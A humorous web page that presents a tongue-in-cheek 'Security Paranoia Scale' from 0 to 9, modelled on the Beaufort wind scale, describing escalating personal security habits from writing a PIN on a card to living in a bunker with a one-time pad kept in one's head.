Security Paranoia Scale
Just like the Beaufort wind scale... but for security.
In the 17th century, a wind scale was devised and standardised on so that naval officers writing the wind speeds in their ship's logs could accurately describe the weather. The problem at the time was that what one man would call "calm", another man might call "windy". Until the scale was developed, there was no way of comparing the logs of two different captains.
A similar problem appears in digital security. What one man might call "safe" another might call "already exploited". Many security experts, tongues firmly in cheeks, will say that "a healthy amount of paranoia is necessary to remain secure online". This scale is an attempt to quantify levels of security paranoia and provide an easy method for identifying them.
|Security Paranoia Number||Name||Description|
|0||Free and easy||
Leaves door to house open. Writes PIN on credit card. Doesn't believe in having computer passwords. When forced to choose a password, chooses '12345'. Double clicks all attachments in email. Clicks on "Hundreds of new Smileys!" ads. Installs Bonsai Buddy.
Locks front door of house. Memorises PIN but keeps original letter in filing cabinet 'just in case'. Usual password is 'password'. When IT enforce a more complex. password, writes it on a sticky note and sticks it to monitor. Never changes default password on any device.
Locks every door of house. Memorises PIN and throws away original letter. Every user account has admin privileges. Uses the same password for every login, for every system. Usual password is dog's name.
Locks windows of house too. Memorises PIN and eats original letter. Only one user on computer has admin privileges. Uses two different passwords; one for safe places and one for everywhere else. Usual password is a dictionary word. Knows that pictures of locks on web sites mean that the site is secure.
Hasn't logged in as admin since the initial install. Issues admin commands using sudo or run as. Uses open source software because he understands it has a good security record but still uses proprietary software when needed. Has three different levels of passwords; low, medium and high security. Usual password is a dictionary word with a number. Knows what each web browser's lock symbols for SSL look like.
Exclusively uses open source software because it can be verified by the community to not contain backdoor code and security flaws. Encrypts and signs sensitive emails. Won't submit a password to any web site unless it is using SSL. Uses sudo but it requires a password every time it is used. Usual password is at least 6 random letters and numbers.
Checks MD5 sums of downloaded software to make sure it hasn't been tampered with. Only uses two different password security levels but uses a different password for everything in high security level. Requires a password to unlock screen saver. Encrypts and signs all emails. Actually reads SSL certificate information in web browser before accepting certificate. Usual password is at least 8 random letters and numbers.
Compiles own open source software and checks MD5 sums of the downloaded source files. Screen saver activates after 5 minutes of inactivity. Encrypts entire home directory. Has a hardware-based random number generator based on radioactive decay attached to computer. Phones web site owners to verify signature on SSL certificate verbally. Usual password is at least 10 random letters, symbols and numbers.
Compiles own open source software but only after doing a complete security audit on every line of code. Invents own encryption algorithm because existing ones aren't good enough. Uses a different password for every authentication. Screen saver activates after 30 seconds of inactivity. Usual password is at least 30 random letters, symbols and numbers.
|9||I have no name.||
Lives in abandoned security bunker from World War II in remote desert. Must authenticate before using toaster. All passwords require modification from a randomly changing security device that updates every 30 seconds. Every authentication requires three-factor authentication from a dongle plugged into the computer, a password and a biometric scan. Never removes sunglasses or gloves outside bunker to keep biometric information secret. Computer requires re-authentication every 30 seconds, regardless of activity. Encrypts home directory with a one-time pad... that only ever existed inside his brain. Has a self destruct button installed in underground lair.
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.